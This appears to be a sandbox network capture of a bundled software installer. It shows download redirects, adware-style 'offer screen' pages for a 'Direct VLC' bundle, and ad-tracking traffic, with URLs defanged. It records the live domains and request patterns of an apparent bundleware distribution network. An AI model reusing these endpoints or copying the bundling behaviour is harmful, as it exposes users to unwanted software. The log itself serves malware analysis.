Content-Length: 0
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: hXXp://fra-7m16-stor04.uploaded.net/dl/7979023c-f144-46ae-93a8-d9ea51ff17e7
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 02 Oct 2015 13:51:21 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-store, no-ca
che, must-revalidate, post-check=0, pre-check=0..Pragma: no-cache..Loc
ation: hXXp://fra-7m16-stor04.uploaded.net/dl/7979023c-f144-46ae-93a8-
d9ea51ff17e7..Vary: Accept-Encoding......


GET /file/awtvmav8 HTTP/1.1


Accept: */*
Cookie: PHPSESSID=0dcbff763f102df88e7e08beb340e927
User-Agent: Setup Factory 8.0
Host: uploaded.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Oct 2015 13:51:22 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: hXXp://am4-r1f9-stor08.uploaded.net/dl/0904ca6b-9076-4741-93df-df1abcd51616
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 02 Oct 2015 13:51:22 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-store, no-ca
che, must-revalidate, post-check=0, pre-check=0..Pragma: no-cache..Loc
ation: hXXp://am4-r1f9-stor08.uploaded.net/dl/0904ca6b-9076-4741-93df-
df1abcd51616..Vary: Accept-Encoding..



GET //offers/DynamicOfferScreen?offerid=5&distid=30060&leadp=29271&countryid=262&sysbit=32&imgurl=&dfb=0&hb=-1&isagg=1&version=6.12&external=0& HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: srv.serverdatasrv.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 02 Oct 2015 13:51:25 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 12677
Connection: keep-alive
<html>.    <head>.      <title>5 - NonProduct (Direc
t VLC)</title><script type='text/javascript'>var _gaq = _g
aq || [];_gaq.push(['_setAccount', 'UA-37348037-1']);_gaq.push(['_setD
omainName', 'ppdownload.com']);_gaq.push(['_setAllowLinker', true]);..
                                            _gaq.push(['_trackPageview
']);..                                            (function() {..     
                                         var ga = document.createEleme
nt('script'); ga.type = 'text/javascript'; ga.async = true;..         
                                     ga.src = ('https:' == document.lo
cation.protocol ? 'hXXps://' : 'hXXp://')   'stats.g.doubleclick.net/d
c.js';..                                              var s = document
.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);.
.                                            })();</script><s
tyle type='text/css'>body      {          width:100%; height:100%; 
margin:0px; padding:0px; font-size:font-family:helvetica; font-size:12
px;}   .divLeadpName      {         border-bottom-style:groove;border-
bottom-width: thin; padding-left:61px; padding-top:9px; font-size:font
-family:helvetica; font-style:italic; font-size:25px;                 
font-weight:bold; color:black; position:absolute;   width: 100%; backg
round-color: #fff; ba}   #divTop         {display: none}  #divMiddle  
    {background-color: #efecec; height: 100%;} #middle    {background-
color: #fff;} .divOnNext      {          position:absolute; width:
<<< skipped >>>

GET //offers/DynamicOfferScreen?offerid=2&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0& HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: srv.serverdatasrv.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 02 Oct 2015 13:51:29 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 8347
Connection: keep-alive
.<html>.    <head>.      .       <style type="text/css"
>.            .ui-progressbar-value { background-image: url(images/
pbar-ani.gif); }.        </style>.       .        <link type=
"text/css" href="hXXp://static.revenyou.com/offers/ui/css/start/jquery
-ui-1.8.19.custom.css" rel="stylesheet" />.        <link href="h
ttp://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/start/jquery-u
i.css" rel="stylesheet" type="text/css" />.        <script  type
="text/javascript"  src="hXXp://ajax.googleapis.com/ajax/libs/jquery/1
.5/jquery.min.js"></script>.        <script  type="text/ja
vascript"  src="hXXp://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jque
ry-ui.min.js"></script>..       <title>2 - NonProduct (
Direct VLC)</title><script type='text/javascript'>var _gaq
 = _gaq || [];_gaq.push(['_setAccount', 'UA-37348037-1']);_gaq.push(['
_setDomainName', 'ppdownload.com']);_gaq.push(['_setAllowLinker', true
]);..                                            _gaq.push(['_trackPag
eview']);..                                            (function() {..
                                              var ga = document.create
Element('script'); ga.type = 'text/javascript'; ga.async = true;..    
                                          ga.src = ('https:' == docume
nt.location.protocol ? 'hXXps://' : 'hXXp://')   'stats.g.doubleclick.
net/dc.js';..                                              var s = doc
ument.getElementsByTagName('script')[0]; s.parentNode.insertBefore
<<< skipped >>>

GET //offers/DynamicOfferScreen?offerid=4&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0& HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: srv.serverdatasrv.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 02 Oct 2015 13:51:38 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 7068
Connection: keep-alive
<html>.    <head>.      <title>4 - NonProduct (Direc
t VLC)</title><script type='text/javascript'>var _gaq = _g
aq || [];_gaq.push(['_setAccount', 'UA-37348037-1']);_gaq.push(['_setD
omainName', 'ppdownload.com']);_gaq.push(['_setAllowLinker', true]);..
                                            _gaq.push(['_trackPageview
']);..                                            (function() {..     
                                         var ga = document.createEleme
nt('script'); ga.type = 'text/javascript'; ga.async = true;..         
                                     ga.src = ('https:' == document.lo
cation.protocol ? 'hXXps://' : 'hXXp://')   'stats.g.doubleclick.net/d
c.js';..                                              var s = document
.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);.
.                                            })();</script><s
tyle type='text/css'>body      {          width:100%; height:100%; 
margin:0px; padding:0px; font-size:font-family:helvetica; font-size:12
px;}   .divLeadpName      {         border-bottom-style:groove;border-
bottom-width: thin; padding-left:61px; padding-top:9px; font-size:font
-family:helvetica; font-style:italic; font-size:25px;                 
font-weight:bold; color:black; position:absolute;   width: 100%; backg
round-color: #fff; ba}   #divTop         {display: none}  #divMiddle  
    {background-color: #efecec; height: 100%;} #middle    {background-
color: #fff;} .divOnNext      {          position:absolute; width:
<<< skipped >>>


GET /offers/images/Theme12/topLine.jpg HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30060&leadp=29271&countryid=262&sysbit=32&imgurl=&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:26 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......
<<< skipped >>>

GET /offers/images/Theme12/bodyImg.png HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30060&leadp=29271&countryid=262&sysbit=32&imgurl=&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:26 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......
<<< skipped >>>

GET /offers/images/Theme12/nextCase.jpg HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30060&leadp=29271&countryid=262&sysbit=32&imgurl=&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:26 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......
<<< skipped >>>

GET /offers/images/Theme12/button_over.png HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30060&leadp=29271&countryid=262&sysbit=32&imgurl=&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2015 13:51:26 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>..HTTP/1.1 404 Not Found..Date: Fri, 02 Oct 2015 13:51:26 GMT..Co
ntent-Type: text/html..Content-Length: 1245..Connection: keep-aliv
<<< skipped >>>


GET /api/vv/1?callback=cb_1443793908941&ts=1443793908941&sessionId=nMTAT&rfr=aHR0cDovL2luc3RhbGxlci5wcGRvd25sb2FkLmNvbS9pbnN0YWxsZXIvVGhhbmtZb3VJbm5lcj9wcm9kdWN0aWQ9MjkyNzEmcHJvZHVjdG5hbWU9RGlyZWN0IFZMQw==&siteId=463&aus=2835,1,0 HTTP/1.1
Accept: */*
Referer: hXXp://n20.adshostnet.com/ads?v=1&key=6c2c19aff050b202bf7c7970cb59cde3&ch=&click=&tz=3&t=1443793908504&requestRef=http://installer.ppdownload.com/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&flashVer=11.6 r602&epom_width=1200&epom_height=1400&scrWidth=1276&scrHeight=846
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.castplatform.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 1098
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
X-Country: UA
P3P: CP='NON UNI COM NAV STA OUR IND'
Set-Cookie: cuuid=8156f703-d38c-4edc-84b3-0cd07b8dd719; expires=Thu, 02 Oct 2025 13:51:40 GMT; domain=d.castplatform.com; path=/
Date: Fri, 02 Oct 2015 13:51:40 GMT
cb_1443793908941 && cb_1443793908941({"zones":[{"id":2835,"status":200
,"enabled":true,"template":"Free_Creative_800x440","data":[{"clickTag"
:null,"clk":"BO9Y0-cT3AnyMFgg9QLiKXfUORxrsG8A1Y7fCBFAMFKqGp-8ULwayarMF
8rGFT_HiDMAYYIC5CSvjC0VYRyPX-3mtfKn2vCZBeodlqW-XQb6TFcnQGFOoht95htA11r
0sA-8bBKCo2z31GBe_RHPinxEUwwgdLAEuPxTDfQWcsZ_0B6G0OPzpWCQZJWFMc1lcC194
cc_2yTj56Q-aaAnZo1w3LsJP5-hZ5myS4vHofEMZAPZJGgIGuQTYQQ4Vuol35-Zq_eNhtl
Dgtt2p9NwWJHTGnsMws6o0EtOGgBqZetKuXzMJsQxZbOLuNu_nm-Gei6PEF7w8Tah13HkG
QxFrnuXTu-t53aHBdq8MORHc_KFBAVhqeXWyOCEBPeRaGQBINCyndTj9BjOO8FDgESdLin
OiFfWepd74JtiB-8Z_5s0jTTXw5Sde86_VTBqm-6dHQCw5VvHXBYuH6h4tY9kch2vZtftu
Xt-MMqHD78Tgre1l1TOpj716x8A3oNeOa_CKKxTHpsIOP91233li0K2MsAVWbFUsxe7jPd
1Ey1sKaw","width":800,"height":440,"cUrl":"hXXp://d.castplatform.com/a
pi/c/1?clk=%clk%","vUrls":["hXXp://d.castplatform.com/api/vp/1?clk=%cl
k%"],"category":null,"assets":[{"assetDisplayType":1,"width":800,"heig
ht":440,"url":"//cdn.castplatform.com/images/f4a270d9-5612-43bd-b9bc-5
d0e41fded55.gif","javascript":"","clickTagVar":""}]}],"styles":null,"s
ettings":null,"displayType":"Size"}],"ts":178});....


GET /api/vp/1?clk=BO9Y0-cT3AnyMFgg9QLiKXfUORxrsG8A1Y7fCBFAMFKqGp-8ULwayarMF8rGFT_HiDMAYYIC5CSvjC0VYRyPX-3mtfKn2vCZBeodlqW-XQb6TFcnQGFOoht95htA11r0sA-8bBKCo2z31GBe_RHPinxEUwwgdLAEuPxTDfQWcsZ_0B6G0OPzpWCQZJWFMc1lcC194cc_2yTj56Q-aaAnZo1w3LsJP5-hZ5myS4vHofEMZAPZJGgIGuQTYQQ4Vuol35-Zq_eNhtlDgtt2p9NwWJHTGnsMws6o0EtOGgBqZetKuXzMJsQxZbOLuNu_nm-Gei6PEF7w8Tah13HkGQxFrnuXTu-t53aHBdq8MORHc_KFBAVhqeXWyOCEBPeRaGQBINCyndTj9BjOO8FDgESdLinOiFfWepd74JtiB-8Z_5s0jTTXw5Sde86_VTBqm-6dHQCw5VvHXBYuH6h4tY9kch2vZtftuXt-MMqHD78Tgre1l1TOpj716x8A3oNeOa_CKKxTHpsIOP91233li0K2MsAVWbFUsxe7jPd1Ey1sKaw&rfr=aHR0cDovL2luc3RhbGxlci5wcGRvd25sb2FkLmNvbS9pbnN0YWxsZXIvVGhhbmtZb3VJbm5lcj9wcm9kdWN0aWQ9MjkyNzEmcHJvZHVjdG5hbWU9RGlyZWN0IFZMQw== HTTP/1.1


Accept: */*
Referer: hXXp://n20.adshostnet.com/ads?v=1&key=6c2c19aff050b202bf7c7970cb59cde3&ch=&click=&tz=3&t=1443793908504&requestRef=http://installer.ppdownload.com/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&flashVer=11.6 r602&epom_width=1200&epom_height=1400&scrWidth=1276&scrHeight=846
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.castplatform.com
Connection: Keep-Alive
Cookie: cuuid=8156f703-d38c-4edc-84b3-0cd07b8dd719


HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 43
Content-Type: image/gif
Server: Microsoft-HTTPAPI/2.0
Set-Cookie: cuuid=601019e8-ef71-4707-b0af-44b1060493b4; expires=Thu, 02 Oct 2025 13:51:40 GMT; domain=d.castplatform.com; path=/
P3P: CP='NON UNI COM NAV STA OUR IND'
Date: Fri, 02 Oct 2015 13:51:40 GMT
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Cache-Cont
rol: no-cache..Content-Length: 43..Content-Type: image/gif..Server: Mi
crosoft-HTTPAPI/2.0..Set-Cookie: cuuid=601019e8-ef71-4707-b0af-44b1060
493b4; expires=Thu, 02 Oct 2025 13:51:40 GMT; domain=d.castplatform.co
m; path=/..P3P: CP='NON UNI COM NAV STA OUR IND'..Date: Fri, 02 Oct 20
15 13:51:40 GMT..GIF89a.............!.......,...........L..;..



GET /typ.png HTTP/1.1
Accept: */*
Referer: hXXp://n20.adshostnet.com/ads?v=1&key=6c2c19aff050b202bf7c7970cb59cde3&ch=&click=&tz=3&t=1443793908504&requestRef=http://installer.ppdownload.com/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&flashVer=11.6 r602&epom_width=1200&epom_height=1400&scrWidth=1276&scrHeight=846
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d2vubraihqcany.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 12685
Connection: keep-alive
Date: Sat, 08 Aug 2015 09:41:29 GMT
Last-Modified: Thu, 05 Feb 2015 14:41:23 GMT
ETag: "dde582f4e99cab24473717788e9548e8"
Accept-Ranges: bytes
Server: AmazonS3
Age: 86024
X-Cache: Hit from cloudfront
Via: 1.1 690dec7c91091903b0d306bae0caac87.cloudfront.net (CloudFront)
X-Amz-Cf-Id: o13sTd_yrHWJq_1YlVFm3CBE2fzgDJWK6VdSiDiM5XNrQQ1UgWYZHA==
.PNG........IHDR.............!.......sRGB.........gAMA......a.....pHYs
.......... ....1"IDATx^...........~./K....^...b...5A..5.I.%.....{.=.c.
...."." ...R...~......,........k_..wf.......gf,...............O...... 
-.`...... ..`...... ..`...... ..`...... ..`...... ..`...... ..`...... 
..`...... ..`...... ..`...... ..`...... ..`...... ..`...... ..`...... 
..`...... ..`...... ..`...... ..`...... ..`...... ..`...... ..`...... 
..`...... ..`...... ..`...... ..`...... ..`...... ..`...... ..`...... 
..`...... ..`...... ..`...... ..`...... ..`...... ..`...... ..`...... 
..`...... ..`...... ..`...... ..`...... ..`...... ..`...... ..`...... 
..`...... ..`...... ..`...... ..`...... ..`...... ..`...... ..`...... 
..`...... ..`...... ..`...... ..`...... ..`...... ..`...... ..`...... 
..`...... ..`...... ..`...... ..`...... ..`...... ..`...... ..`...... 
..`...... ..`...... ..`...... .Y:...........@....:.........i..ji5.....
.....5zN...........7q......@Z#.......@Z#.......@Z#.......@Z#.......@Z#
.......@Z#.......@Z#.......@Z#.......@Z#.......@Z#.......@Z#.......@Z#
.......@Z#.......@Z#.......@Z#.......@Z#.......@Z#.......@Z#.......@Z#
.......@Z#.......@Z#[email protected].#.....5.....
..?T-._^.[JF....^=.Yry.r{<u.7/....x"..WZ.1.d.X8}....<....c..Q4..
{5.Xr..r.\...Q|..py.......E.r..............Z*.>J.7$.......|.....*j.
/m..o./RR=.oXo..0.r....1..`.By.u........-./..e..l.*U...e...a.....t..\^
.t..L_.x......../....*...M].V......Bv..XNx...q.iy.v59t..5...G..%Z>w
.J.].../.gxd..4..?..,.....7K.~.Az....~.y...#_ (...x.RQg.......B.Ct
<<< skipped >>>


GET /ajax/libs/jqueryui/1.8/themes/start/jquery-ui.css HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=2&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ajax.googleapis.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/css; charset=UTF-8
Last-Modified: Fri, 12 Oct 2012 18:27:19 GMT
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Date: Fri, 02 Oct 2015 13:46:00 GMT
Expires: Fri, 02 Oct 2015 14:46:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 6091
X-XSS-Protection: 1; mode=block
Age: 329
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=3600
[email protected]..~...e.#K.$.#A..=.!%J|iz...
;@Z.:...y..}..........X.H~{G...O~......-.M^[email protected]........
....!/.Ms.\\...'t.&qy..........hN.,fE..r*.V.f..O.>.."...G._.... s.W
O8f....v...dJ>O...H ..o..>..! v.o~y...gg.....#.D.,?BwgQ...&.,B.h
.%. .'.d.1...R...&.M...1..l.3.?.u..t.B.u...F....e....&q..7.bq.bv| ....
....... V..z;.j.A_.kr.I.J...e.z..A.yV0........0..5i.C.%,. .L..iY4Q.}..
.t......y..U.q.h.f..-K.....3.6...H..Y..|..u.....\d[T.........>.....
.|...Y...T.*...<..X..F.S.:.4..G.<.r`k.&?........0.p.w gEcN..=.'8
a...E......~...$OXJOy.s)...ud..\tQ.Z$$;..|.}[email protected]^...S2.gn.h......;V.
yy.!...{4..U%D>x....{...2.SV....!Y<....3..e...cMTb.5.,f...r..$Or
..%X...78.I.>[email protected].<.W 
EY.h.<.U.l2c.....V.J..T.^...owo.....(...|...Sh..~x..l..ovyY.7...M..
. ..v2.%.j....Np1_....4...M...9.~.,y.V..b.-...i.&i.q...W7......*1.QP.k
:C..^.k6..T.\.u,..LW.(S<)5.............X...ZW...#.UC*.:nT;.....\<
;._.. J.YK.:9.H}3....U.B..$..W..f$l]^[email protected].,(."
......l.%........:.A..y.'n.. ..j:.q2.]r..M...j.JSQ....i.8...J...".iZ.V
.....5..'S:.*..C..V.Y.!S.k*.:FT.tv...1.P.A.e..r.h......-..uGZ6.(.....l
..!5....z....2M!.?.G.........'....U>..-aH/ .E.D.T{J..C!...tK.!.a.v.
.~......$....5 ..xj.u...P...x.@ F{..S..R.O.<d#.E%PS.//......5fV.4..
.1..S.......mw..#..o Q. .....p_yI..ox.....UM.uP....b.v0GE.....A....X.!
pX4.......Y-o..f9.....L.p$.........;..P...Q.b........mZe..$s..].8..t..
.M...o......X...S".>..1A*.....2h......D.j8Y..wL..^.| ....1...`C
<<< skipped >>>

GET /ajax/libs/jqueryui/1.8/jquery-ui.min.js HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=2&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ajax.googleapis.com
Connection: Keep-Alive


